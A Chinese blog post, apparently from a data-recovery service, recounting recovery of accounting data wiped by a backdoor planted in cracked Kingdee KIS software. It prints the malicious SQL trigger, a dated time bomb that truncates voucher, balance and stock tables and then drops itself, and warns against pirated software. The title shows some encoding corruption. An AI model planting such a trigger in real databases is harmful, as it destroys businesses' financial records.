金蝶KIS專業(yè)版替換allinone和sxs.dll補?。ㄔ夂箝T清空或破壞數(shù)據(jù)被修改為“恢復(fù)數(shù)據(jù)請聯(lián)系”）

[重要通告]如您遇疑難雜癥,本站支持知識付費業(yè)務(wù),掃右邊二維碼加博主微信,可節(jié)省您寶貴時間哦!

近日在百度搜索來的一個客戶，描述了一下自己用的金蝶KIS 12.2/12.3 專業(yè)版，網(wǎng)上下載的盜版，本想著用幾年后就買正版或者找一個靠譜的版本使用，發(fā)現(xiàn)并無大礙，一直用到了2021年，用了近6年，2021年底早上進公司發(fā)現(xiàn)數(shù)據(jù)全部被篡改，如下圖

數(shù)據(jù)恢復(fù)故障描述

看了一下客戶的財務(wù)電腦，是XP的系統(tǒng)，果然很老了，被盜版補丁留下的后門入侵修改了所有數(shù)據(jù)，刪除了所有備份！ 畢竟做了這么多年的賬，突然要付之東流，很是費解；

使用破解版財務(wù)軟件，破解者破解后內(nèi)藏了后門，清空所有數(shù)據(jù)的觸發(fā)器。用了幾年時間后，后門觸發(fā)器被激活，刪除了所有 科目余額表、存貨余額、存貨往來明細賬、修改了所有 總賬憑證、業(yè)務(wù)憑證、會計科目等，這樣才可以所要更多的金額，說明做這漏洞的人，心機很重；

【臨時處理方法】

此時建議立即停止SQL服務(wù)，分離數(shù)據(jù)庫源文件，復(fù)制拷貝備份處理！切勿重裝金蝶軟件，切勿重裝SQLserver??！如還原其他備份，需事先拷貝 事故后第一手文件，進行備份。不要用賬套管理器進行備份，那樣是沒用的哦；

【數(shù)據(jù)恢復(fù)過程】

接到電話后，客戶發(fā)來遭后門修改數(shù)據(jù)庫文件，立即組織對數(shù)據(jù)庫分析工作，發(fā)現(xiàn)數(shù)據(jù)庫內(nèi)有一個后門觸發(fā)器?t_log_autoNumbe ，大致代碼內(nèi)容為：

if (@FGLCurrYear=2014 and @FGLCurrPeriod>=1) or (@FICCurrYear=2014 and @FICCurrPeriod>=1)

begin
if (@Flogdays>=15)
begin
TRUNCATE TABLE t_voucherEntry ?--刪除總賬憑證
TRUNCATE TABLE t_balance --刪除科目余額表
if @FVersion=‘8.0‘ ?--版本大于8.0
TRUNCATE TABLE icstockbillEntry --刪除存貨出入庫明細賬
else
TRUNCATE TABLE t_cc_stockbillEntry --刪除出入庫存貨明細賬
drop trigger t_log_AutoNumber
end
end

GO

1．對故障盤進行全盤鏡像，對mdf文件進行備份，防止二次造成破壞。

2．對鏡像盤進行掃描重組，對刪除的表進行字段分析。

3．對mdf進行底層數(shù)據(jù)分析，與表結(jié)構(gòu)進行匹配。

4．通過程序的匹配，找到所有刪除表的原始ID。

5．通過ID和新表結(jié)構(gòu)，對數(shù)據(jù)進行提取，生成SQL 腳本。

6．把SQL腳本附加到新的數(shù)據(jù)庫中。

7．把未刪除的表的數(shù)據(jù)進行遷移。

【恢復(fù)結(jié)果】：發(fā)回給客戶測試驗收，反饋數(shù)據(jù)基本正確，能恢復(fù)這個程度，也實屬困難，客戶很滿意！得到客戶的極大好評。

【溫馨提示】：使用網(wǎng)上隨便下載的破解版軟件，危害很大；居心不良的破解者，可能會留下后門木馬，刪除修改數(shù)據(jù)，敲詐錢財。如果商用，請使用正版軟件；如經(jīng)濟實力不允許，也不要到處下載軟件所使用；

PS：好好的軟件，為啥免費？還不是為了后期讓你繳費，說白了就是讓你支付更多的錢財；1、正版 2、找有技術(shù)或者技術(shù)支持的；

問題未解決？付費解決問題加Q或微信 2589053300 (即Q號又微信號)右上方掃一掃可加博主微信

所寫所說，是心之所感，思之所悟，行之所得；文當無敷衍，落筆求簡潔。 以所舍，求所獲；有所依，方所成！